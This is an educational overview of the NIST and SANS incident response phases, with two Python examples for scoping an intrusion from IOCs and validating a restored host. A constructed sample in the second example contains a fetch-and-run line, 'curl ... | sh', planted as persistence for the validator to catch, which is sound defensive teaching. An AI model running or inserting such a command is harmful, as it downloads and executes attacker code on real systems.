Incident response frameworks and phases give organizations a structured way to detect, contain, analyze, eradicate, recover from, and learn from cybersecurity incidents in a coordinated manner.
Frameworks such as NIST SP 800-61 and the SANS six-step process lay out sequential steps that minimize damage, preserve evidence, and improve future resilience, with forensics integrated throughout to support attribution and legal requirements.
They are essential in computer and cyber forensics because they guide teams through the chaos of an active incident, turning reactive firefighting into a repeatable process that aligns the technical response with business continuity.
NIST Incident Response Framework
NIST SP 800-61 Rev. 2 defines a four-phase lifecycle that emphasizes preparation and iterates rather than running strictly once (Rev. 3, published in 2024, reorganizes the same activities around the CSF 2.0 functions, but the four-phase lifecycle remains the form most teams use).
Preparation establishes policies, the incident response team, tooling, and training, and records baselines so that "normal" is defined before anything abnormal appears. Detection and analysis triages alerts from SIEM and EDR, correlating logs to establish scope, severity, and likely cause. Containment, eradication, and recovery are grouped into one phase because they overlap in practice: contain the spread (isolate affected hosts and network segments), eradicate the root cause (remove malware, close the exploited weakness, patch), then recover (restore from verified backups and return systems to service). Analysis findings frequently send the team back to detection and analysis as new hosts or accounts are discovered, which is why the lifecycle is drawn as a loop.
Post-incident activity reviews how well each phase worked and feeds the results back into playbooks, detections, and preparation.

SANS Incident Response Model
SANS breaks the same work into six steps (Preparation, Identification, Containment, Eradication, Recovery, Lessons Learned), with granular checklists for each.
Preparation mirrors NIST and produces the runbooks the handlers will follow. Identification confirms that an anomaly is actually an incident and determines its scope. Containment is split into short-term (firewall rules, host isolation) and long-term (temporary fixes such as patching and credential resets that let a system stay in production until it can be rebuilt), with forensic imaging taken before long-term changes alter the system. Eradication hunts down and removes remnants such as dropped binaries, persistence mechanisms, and attacker-created accounts; recovery returns systems to service and validates that they are clean. Lessons learned documents the gaps the incident exposed.
The model is widely adopted in enterprise environments because of its practicality.
Preparation Phase Details
Proactive readiness prevents chaos: the team, its authority, its tooling, and its communication channels are established before the first alert. This phase produces the policies and runbooks referenced above, trains handlers on them, and captures baselines of normal host, network, and account behaviour so that detection has something to compare against. Acquisition and analysis tooling is staged in advance so evidence can be collected without improvising on a compromised system.
Detection and Analysis Phase
Rapid triage establishes the scope and impact of what has been detected.
SIEM alerts trigger the investigation; analysts then pivot on the indicators of compromise they carry (file hashes, IP addresses, domains, accounts) to find related activity. The order of volatility guides evidence acquisition: memory, network state, and running processes are captured first because they disappear on reboot, disk later. Analysis is hypothesis-driven, for example "phishing, then lateral movement, then ransomware?", and each stage of the hypothesis is tested against correlated endpoint, network, and cloud logs.
Tools: Splunk queries, Elastic Timeline Explorer.
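The IOC pivot and hypothesis test described above, as an added worked example that is not part of the original page. The event records, IOC values, hostnames, and timestamps are constructed for illustration and represent no real incident; the assumption is that endpoint, network, and cloud logs have already been normalized into one schema.

```python
"""Hypothesis-driven IOC pivot over correlated endpoint/network/cloud events.

Added example; all events, IOCs, and hostnames below are constructed.
"""

# Constructed sample events, already normalised into one schema (UTC ISO-8601 timestamps).
EVENTS = [
    {"ts": "2024-05-01T09:02:11Z", "src": "email", "host": "WS-041", "user": "alice",
     "type": "attachment_opened", "sha256": "deadbeef00", "remote_ip": None},
    {"ts": "2024-05-01T09:02:40Z", "src": "edr", "host": "WS-041", "user": "alice",
     "type": "process_start", "sha256": "deadbeef00", "remote_ip": None},
    {"ts": "2024-05-01T09:03:05Z", "src": "fw", "host": "WS-041", "user": None,
     "type": "outbound_connection", "sha256": None, "remote_ip": "203.0.113.7"},
    {"ts": "2024-05-01T09:40:18Z", "src": "edr", "host": "WS-041", "user": "alice",
     "type": "credential_dump", "sha256": None, "remote_ip": None},
    {"ts": "2024-05-01T10:15:02Z", "src": "winevt", "host": "FS-02", "user": "alice",
     "type": "logon_type3", "sha256": None, "remote_ip": "10.0.4.41"},
    {"ts": "2024-05-01T10:16:30Z", "src": "edr", "host": "FS-02", "user": "alice",
     "type": "process_start", "sha256": "cafebabe11", "remote_ip": None},
    {"ts": "2024-05-01T10:18:00Z", "src": "edr", "host": "FS-02", "user": "alice",
     "type": "mass_file_rename", "sha256": None, "remote_ip": None},
    # Unrelated activity that the pivot must NOT pull into scope.
    {"ts": "2024-05-01T10:20:00Z", "src": "cloud", "host": None, "user": "bob",
     "type": "console_login", "sha256": None, "remote_ip": "198.51.100.9"},
]

# IOCs known at triage time (constructed): the phishing payload hash and its C2 address.
IOCS = {"sha256": {"deadbeef00"}, "ip": {"203.0.113.7"}}

# The hypothesis "Phishing -> Lateral -> Ransomware" as ordered stages; any of the
# listed event types satisfies a stage.
HYPOTHESIS = [
    ("phishing", {"attachment_opened"}),
    ("execution", {"process_start"}),
    ("lateral", {"logon_type3"}),
    ("ransomware", {"mass_file_rename"}),
]


def ioc_hits(events, iocs):
    """Seed the investigation with every event carrying a known-bad hash or IP."""
    return [e for e in events
            if e["sha256"] in iocs["sha256"] or e["remote_ip"] in iocs["ip"]]


def pivot(events, seeds):
    """Expand scope from the seed events to every event sharing a host or user,
    repeating until no new hosts or users appear (a fixpoint). Returns a timeline."""
    hosts = {e["host"] for e in seeds if e["host"]}
    users = {e["user"] for e in seeds if e["user"]}
    while True:
        in_scope = [e for e in events if e["host"] in hosts or e["user"] in users]
        new_hosts = {e["host"] for e in in_scope if e["host"]}
        new_users = {e["user"] for e in in_scope if e["user"]}
        if new_hosts == hosts and new_users == users:
            return sorted(in_scope, key=lambda e: e["ts"])
        hosts, users = new_hosts, new_users


def check_hypothesis(timeline, hypothesis):
    """Walk the stages in order; each must be observed after the previous one.
    Returns stage -> timestamp of the first supporting event, or None if unsupported."""
    found, cursor = {}, ""  # ISO-8601 UTC strings compare correctly as text
    for stage, types in hypothesis:
        match = next((e for e in timeline if e["type"] in types and e["ts"] > cursor), None)
        found[stage] = match["ts"] if match else None
        if match:
            cursor = match["ts"]
    return found


if __name__ == "__main__":
    scope = pivot(EVENTS, ioc_hits(EVENTS, IOCS))
    print("hosts in scope:", sorted({e["host"] for e in scope if e["host"]}))
    for stage, ts in check_hypothesis(scope, HYPOTHESIS).items():
        print(f"{stage:<11} {ts or 'UNSUPPORTED'}")
```

The pivot deliberately scopes on host and user only; bob's cloud console login stays outside the scope because nothing links it to the seeded hosts or accounts, which is the behaviour you want from a scoping step that should not turn every alert into an enterprise-wide incident. A stage reported as UNSUPPORTED means the hypothesis needs revising or more log sources need to be pulled, not that the incident is over.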
Containment, Eradication, Recovery
Action halts the attacker's progression while preserving the evidence needed for analysis and attribution.
Short-term containment uses network ACLs and endpoint isolation so the host keeps running but can no longer reach the attacker or other systems. Eradication removes the malware and persistence, rotates every credential the attacker could have captured, and deploys the patch or configuration change that closes the entry point. Recovery restores systems in phases from backups verified to predate the compromise, and each restored system is validated with integrity and IOC scans before it returns to service.
Forensics runs in parallel: capture memory and disk images before any containment action (power-off, reimaging, credential resets) that would alter or destroy the evidence.
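The recovery validation step above, as an added worked example that is not part of the original page: a restored host's files are checked against the verified backup's hash manifest, and every file is swept against the IOC hash list from eradication. The file paths, contents, and the "malware" bytes are constructed for illustration; the backup manifest is assumed to have been taken and verified before the incident.

```python
"""Validate a restored host against a verified backup manifest and eradication IOCs.

Added example; file contents, paths, and IOC hashes below are constructed.
"""
import hashlib


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Constructed known-good state captured in the pre-incident backup.
GOOD_FILES = {
    "/etc/ssh/sshd_config": b"PasswordAuthentication no\n",
    "/usr/local/bin/backup.sh": b"#!/bin/sh\nrsync -a /srv /mnt/backup\n",
}
BACKUP_MANIFEST = {path: sha256(content) for path, content in GOOD_FILES.items()}

# Constructed "malware" whose hash was recorded as an IOC during eradication.
MALWARE = b"MZ-fake-ransomware-dropper"
IOC_HASHES = {sha256(MALWARE)}

# Constructed restored host: one script has been tampered with and a remnant survived.
RESTORED_HOST = {
    "/etc/ssh/sshd_config": b"PasswordAuthentication no\n",
    "/usr/local/bin/backup.sh": b"#!/bin/sh\nrsync -a /srv /mnt/backup\ncurl http://203.0.113.7/x | sh\n",
    "/tmp/.x/update.exe": MALWARE,
}


def validate_restore(host_files, manifest, ioc_hashes):
    """Compare restored files with the backup manifest and sweep for IOC hashes.

    host_files maps path -> bytes as read from the restored host (here constructed).
    Returns a findings dict; 'clean' is True only when every check is empty.
    """
    findings = {"modified": [], "missing": [], "unexpected": [], "ioc_match": []}
    for path, expected in manifest.items():
        if path not in host_files:
            findings["missing"].append(path)
        elif sha256(host_files[path]) != expected:
            findings["modified"].append(path)
    for path, content in host_files.items():
        if sha256(content) in ioc_hashes:
            findings["ioc_match"].append(path)
        if path not in manifest:
            # Anything not in the verified backup is suspect until explained.
            findings["unexpected"].append(path)
    findings["clean"] = not any(findings[k] for k in ("modified", "missing", "unexpected", "ioc_match"))
    return findings


def unrotated_credentials(credentials, incident_start):
    """Eradication gate: every credential must have a rotation time after the
    earliest known attacker activity. credentials maps name -> ISO-8601 rotated_at."""
    return sorted(name for name, rotated_at in credentials.items() if rotated_at <= incident_start)


if __name__ == "__main__":
    result = validate_restore(RESTORED_HOST, BACKUP_MANIFEST, IOC_HASHES)
    for key, value in result.items():
        print(f"{key:<10} {value}")
    creds = {"svc_backup": "2024-04-20T00:00:00Z", "alice": "2024-05-02T08:00:00Z"}
    print("still unrotated:", unrotated_credentials(creds, "2024-05-01T09:02:11Z"))
```

A host that fails any check goes back to eradication rather than into production; the modified backup script in the sample is exactly the kind of persistence a hash-only IOC sweep would miss, which is why the manifest comparison and the IOC sweep are both required.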

Post-Incident Activities
The lessons-learned review (NIST post-incident activity, SANS lessons learned) documents what was missed, how long detection, containment, and recovery took, and which playbooks, detections, and baselines need updating; the output feeds directly back into preparation for the next incident.